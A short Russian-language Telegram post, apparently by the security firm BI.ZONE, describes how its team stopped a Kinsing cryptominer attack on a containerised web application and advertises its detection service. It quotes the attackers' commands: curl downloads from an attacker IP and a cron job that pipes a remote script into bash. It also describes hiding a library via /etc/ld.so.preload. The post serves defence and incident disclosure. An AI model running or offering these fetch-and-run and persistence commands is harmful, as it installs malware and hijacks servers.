group-telegram.com/bizone_channel/1401
Create:
Last Update:
Last Update:
Чем популярнее становятся контейнеры, тем больше появляется угроз, связанных с уязвимостями этих сред.
Рассказываем, как мы остановили атаку кластера активности Resourceful Wolf. Она началась с эксплуатации уязвимости публичного веб-приложения, запущенного в контейнере.
Что сделали злоумышленники:
1. Загрузили с внешнего ресурса ПО для майнинга Kinsing:
curl -o /tmp/libsystem.so http://95.142.47[.]27/libsystem.so ; curl -o /tmp/kinsing http://95.142.47[.]27/kinsing
Kinsing — вредоносное ПО на основе Golang, которое используется для добычи криптовалюты на взломанном сервере. Обычно злоумышленники устанавливают этот майнер в контейнере, поэтому для защиты от подобного ВПО важно иметь под рукой решения или сервисы, позволяющие видеть происходящее в таких средах.
2. Закрепились через задачу Cron:
* * * * * curl http://95.142.47[.]27/kinsing | bash > /dev/null 2>&1
3. Попробовали скрыть вредоносную активность в системе — добавили в /etc/ld.so.preload вредоносную библиотеку /tmp/libsystem.so.
4. Удалили историю вводимых команд.
Команда BI.ZONE TDR остановила атаку. Мы изолировали скомпрометированный хост, проанализировали контейнер и предотвратили вредоносную активность.
BI.ZONE EDR в составе сервиса BI.ZONE TDR позволяет вести мониторинг событий в контейнерах, при необходимости обеспечивая активное реагирование на хостах. В результате удается защитить контейнерные среды от ВПО вроде майнера Kinsing.
Напишите нам, и мы проведем бесплатное пилотирование.
